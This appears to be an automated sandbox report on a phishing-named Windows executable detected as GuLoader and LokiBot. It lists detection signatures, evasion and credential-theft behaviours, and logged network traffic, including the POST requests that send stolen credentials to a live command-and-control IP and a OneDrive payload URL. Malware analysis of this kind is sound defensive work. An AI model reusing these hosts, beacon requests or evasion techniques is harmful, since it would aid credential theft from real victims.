Loading ...

Play interactive tourEdit tour

Analysis Report URGENT QUOTATION.exe

Overview

General Information

Sample Name:URGENT QUOTATION.exe
Analysis ID:356236
MD5:b49c71be94624173a9683580c792b195
SHA1:4b78a8199129007580b91060db70ce44fe7278e5
SHA256:8cf8f18fb85f0e190ff77fd57264cf9e31dd7128f1b4ad43713e128a6d68e867
Tags:GuLoader

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • URGENT QUOTATION.exe (PID: 6160 cmdline: 'C:\Users\user\Desktop\URGENT QUOTATION.exe' MD5: B49C71BE94624173A9683580C792B195)
    • URGENT QUOTATION.exe (PID: 6792 cmdline: 'C:\Users\user\Desktop\URGENT QUOTATION.exe' MD5: B49C71BE94624173A9683580C792B195)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    Process Memory Space: URGENT QUOTATION.exe PID: 6160JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
      Process Memory Space: URGENT QUOTATION.exe PID: 6160JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
        Process Memory Space: URGENT QUOTATION.exe PID: 6792JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
          Process Memory Space: URGENT QUOTATION.exe PID: 6792JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: http://51.195.53.221/p.php/594QbwaP456ANVirustotal: Detection: 10%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: URGENT QUOTATION.exeVirustotal: Detection: 28%Perma Link
            Source: URGENT QUOTATION.exeReversingLabs: Detection: 48%
            Machine Learning detection for sampleShow sources
            Source: URGENT QUOTATION.exeJoe Sandbox ML: detected

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: URGENT QUOTATION.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49743 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49743 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49743 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49744 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49744 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49744 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49748 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49748 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49748 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49748 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49749 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49749 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49750 -> 51.195.53.221:80
            Source: Joe Sandbox ViewIP Address: 51.195.53.221 51.195.53.221
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: unknownHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Feb 2021 18:55:26 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8
            Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: URGENT QUOTATION.exe, 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=604AA6C584DB9137&resid=604AA6C584DB9137%21123&authkey=ANCFnep

            System Summary:

            barindex
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: URGENT QUOTATION.exe
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021853EC NtWriteVirtualMemory,0_2_021853EC
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218613D NtSetInformationThread,NtMapViewOfSection,0_2_0218613D
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02185CF0 NtProtectVirtualMemory,0_2_02185CF0
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021804E7 EnumWindows,NtSetInformationThread,NtWriteVirtualMemory,0_2_021804E7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186210 NtMapViewOfSection,0_2_02186210
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186239 NtMapViewOfSection,0_2_02186239
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186263 NtMapViewOfSection,0_2_02186263
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186281 NtMapViewOfSection,0_2_02186281
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186315 NtMapViewOfSection,0_2_02186315
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218633D NtMapViewOfSection,0_2_0218633D
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186328 NtMapViewOfSection,0_2_02186328
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186353 NtMapViewOfSection,0_2_02186353
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186387 NtMapViewOfSection,0_2_02186387
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218182B NtWriteVirtualMemory,0_2_0218182B
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182822 NtWriteVirtualMemory,0_2_02182822
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182873 NtWriteVirtualMemory,0_2_02182873
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021820B4 NtSetInformationThread,0_2_021820B4
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021828CA NtWriteVirtualMemory,0_2_021828CA
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218290F NtWriteVirtualMemory,0_2_0218290F
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186145 NtMapViewOfSection,0_2_02186145
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218216A NtSetInformationThread,NtWriteVirtualMemory,0_2_0218216A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186161 NtMapViewOfSection,0_2_02186161
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186197 NtMapViewOfSection,0_2_02186197
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021861B5 NtMapViewOfSection,0_2_021861B5
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021861F5 NtMapViewOfSection,0_2_021861F5
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02180602 NtSetInformationThread,0_2_02180602
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182605 NtWriteVirtualMemory,0_2_02182605
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218063F NtSetInformationThread,0_2_0218063F
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182666 NtWriteVirtualMemory,0_2_02182666
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182689 NtWriteVirtualMemory,0_2_02182689
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021826B2 NtWriteVirtualMemory,0_2_021826B2
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021826F9 NtWriteVirtualMemory,0_2_021826F9
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182727 NtWriteVirtualMemory,0_2_02182727
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182773 NtWriteVirtualMemory,0_2_02182773
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021827A3 NtWriteVirtualMemory,0_2_021827A3
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218247B NtWriteVirtualMemory,0_2_0218247B
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021824D3 NtWriteVirtualMemory,0_2_021824D3
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021824EB NtWriteVirtualMemory,0_2_021824EB
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021814E5 NtWriteVirtualMemory,0_2_021814E5
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182523 NtWriteVirtualMemory,0_2_02182523
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218058F NtSetInformationThread,0_2_0218058F
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182581 NtWriteVirtualMemory,0_2_02182581
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021825B7 NtWriteVirtualMemory,0_2_021825B7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021805AB NtSetInformationThread,0_2_021805AB
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021805CD NtSetInformationThread,0_2_021805CD
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021845FA NtSetInformationThread,NtWriteVirtualMemory,0_2_021845FA
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00565CF0 NtProtectVirtualMemory,4_2_00565CF0
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562CB0 Sleep,NtProtectVirtualMemory,4_2_00562CB0
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056216A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,4_2_0056216A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056210E TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,4_2_0056210E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056613D NtSetInformationThread,4_2_0056613D
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562DB2 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,4_2_00562DB2
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005620B4 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,4_2_005620B4
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562D5B NtProtectVirtualMemory,4_2_00562D5B
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562144 LdrInitializeThunk,NtProtectVirtualMemory,4_2_00562144
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566145 NtSetInformationThread,4_2_00566145
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056217B NtProtectVirtualMemory,4_2_0056217B
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566161 NtSetInformationThread,4_2_00566161
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562117 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,4_2_00562117
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562D26 NtProtectVirtualMemory,4_2_00562D26
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562D29 NtProtectVirtualMemory,4_2_00562D29
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005661F5 NtSetInformationThread,4_2_005661F5
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005621EF NtProtectVirtualMemory,4_2_005621EF
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562D96 LdrInitializeThunk,NtProtectVirtualMemory,4_2_00562D96
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566197 NtSetInformationThread,4_2_00566197
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562D99 LdrInitializeThunk,NtProtectVirtualMemory,4_2_00562D99
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005621B5 NtProtectVirtualMemory,4_2_005621B5
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005661B5 NtSetInformationThread,4_2_005661B5
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562DBB LdrInitializeThunk,NtProtectVirtualMemory,4_2_00562DBB
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562E46 LdrInitializeThunk,NtProtectVirtualMemory,4_2_00562E46
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566263 NtSetInformationThread,4_2_00566263
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566210 NtSetInformationThread,4_2_00566210
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562E0F LdrInitializeThunk,NtProtectVirtualMemory,4_2_00562E0F
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566239 NtSetInformationThread,4_2_00566239
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566281 NtSetInformationThread,4_2_00566281
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566353 NtSetInformationThread,4_2_00566353
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566315 NtSetInformationThread,4_2_00566315
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056633D NtSetInformationThread,4_2_0056633D
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566328 NtSetInformationThread,4_2_00566328
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566387 NtSetInformationThread,4_2_00566387
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562F0F4_2_00562F0F
            Source: URGENT QUOTATION.exe, 00000000.00000000.646889990.000000000043B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exe, 00000000.00000002.674117945.0000000002140000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exe, 00000004.00000002.711483674.000000001DD80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exe, 00000004.00000002.711498445.000000001DED0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exe, 00000004.00000000.671322005.000000000043B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exeBinary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@2/1
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile created: C:\Users\user\AppData\Local\Temp\~DFBD8596DEFB17F0B4.TMPJump to behavior
            Source: URGENT QUOTATION.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: URGENT QUOTATION.exeVirustotal: Detection: 28%
            Source: URGENT QUOTATION.exeReversingLabs: Detection: 48%
            Source: unknownProcess created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe' Jump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY
            Yara detected VB6 Downloader GenericShow sources
            Source: Yara matchFile source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY
            Source: URGENT QUOTATION.exeStatic PE information: real checksum: 0x29a19 should be: 0x2d90a
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218321F push ebx; iretd 0_2_02183222
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218020B push ebx; iretd 0_2_0218020E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02185A39 push ebx; iretd 0_2_02185A3A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218223D push ebx; iretd 0_2_0218223E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218023F push ebx; iretd 0_2_02180242
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02181A31 push ebx; iretd 0_2_02181A32
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02180227 push ebx; iretd 0_2_0218022A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218525B push ebx; iretd 0_2_0218525E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218024B push ebx; iretd 0_2_0218024E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218527B push ebx; iretd 0_2_0218527E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02185A7B push ebx; iretd 0_2_02185A7E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218127F push ebx; iretd 0_2_02181282
